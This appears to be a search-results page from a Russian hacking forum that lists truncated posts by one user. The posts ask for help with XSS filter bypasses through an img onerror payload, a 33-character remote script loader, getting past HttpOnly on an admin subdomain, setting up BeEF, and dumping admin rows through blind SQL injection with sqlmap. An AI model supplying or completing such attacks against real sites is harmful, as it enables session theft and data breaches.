Вернуться   RDot > Поиск по форуму

Показано с 1 по 9 из 9.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Марк Эльва
Раздел: Web-среда/Web-applications 02.02.2017, 02:54
Ответов: 3,618
Просмотров: 2,584,688
Автор Марк Эльва
XSS. Задача обойти фильтр. Пропускает...

XSS.
Задача обойти фильтр.
Пропускает исключительно <img>

Сайт №1.

Отправляю:

<img src="/" onerror="javascript:img = new Image(); img.src =...
Раздел: Инструментарий/Tools 02.02.2017, 02:18
Ответов: 0
Просмотров: 7,781
Автор Марк Эльва
Question Запуск BeEF на CentOS VDS

Приветствую.
Установил BeEF на VDS с CentOS на борту, в /root/beef
Конфиг не изменял - добавил IP хоста и данные MySQL.
Запускается, но UI интерфейс не работает.

Скрин:...
Раздел: Оффтоп/Offtopic 13.01.2017, 13:22
Ответов: 0
Просмотров: 6,857
Автор Марк Эльва
Question Запуск BeEF на CentOS VDS

Приветствую.
Установил BeEF на VDS с CentOS на борту, в /root/beef
Конфиг не изменял - добавил IP хоста и данные MySQL.
Запускается, но UI интерфейс не работает.

Скрин:...
Раздел: Web-среда/Web-applications 21.11.2016, 02:54
Ответов: 4
Просмотров: 11,345
Автор Марк Эльва
Да, точно. Но есть ещё метод с сокращением...

Да, точно. Но есть ещё метод с сокращением количества символов.
Кто-то из местных наверняка знает, как сократить до минимума.
Раздел: Web-среда/Web-applications 21.11.2016, 02:15
Ответов: 4
Просмотров: 11,345
Автор Марк Эльва
[XSS] Javascript в 33 символа

Доброго времени суток.
Необходимо уместить подгрузку js скрипта, в 33 символа.

В данный момент помещается лишь
<script src="https://host.qq/1.j

Как сократить скрипт?
Раздел: Web-среда/Web-applications 11.11.2016, 12:15
Ответов: 3
Просмотров: 8,737
Автор Марк Эльва
Точная страница в админке не известна, (...

Точная страница в админке не известна, ( /secret_page.html ), т.е куда тноведет редирект в админке после авторизации.
На / или другую страницу, можно обыграть в скрипте автоматический редирект?...
Раздел: Web-среда/Web-applications 10.11.2016, 22:42
Ответов: 3
Просмотров: 8,737
Автор Марк Эльва
HTML на сервере + HTTP_Only

Приветствую.
Ситуация следующая.
Сервер с SSL и http_only.
Админ панель располагается на admin.domen.com
Файл загружается на https://admin.domen.com/papka/files/file.html


Какие действия...
Раздел: Оффтоп/Offtopic 02.01.2016, 13:39
Ответов: 3
Просмотров: 5,217
Автор Марк Эльва
Спасибо, я знаю как написать обычный запрос, а...

Спасибо, я знаю как написать обычный запрос, а под перебор с слепой скулей не понятно.

SELECT one,two FROM db WHERE user_id=1
.

Появился второй вопрос, дабы не плодить темы, задам сюда же....
Раздел: Оффтоп/Offtopic 01.01.2016, 21:18
Ответов: 3
Просмотров: 5,217
Автор Марк Эльва
SQLMap. Фильтр по данным

Здравствуйте.
Знающие, откликнитесь и подскажите.
Имеется blind sql inj.
Необходимо сдампить всех админов. Колонка group_id=1
Как получать данные только group_id 1, а не всех подряд?
С...
Показано с 1 по 9 из 9.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot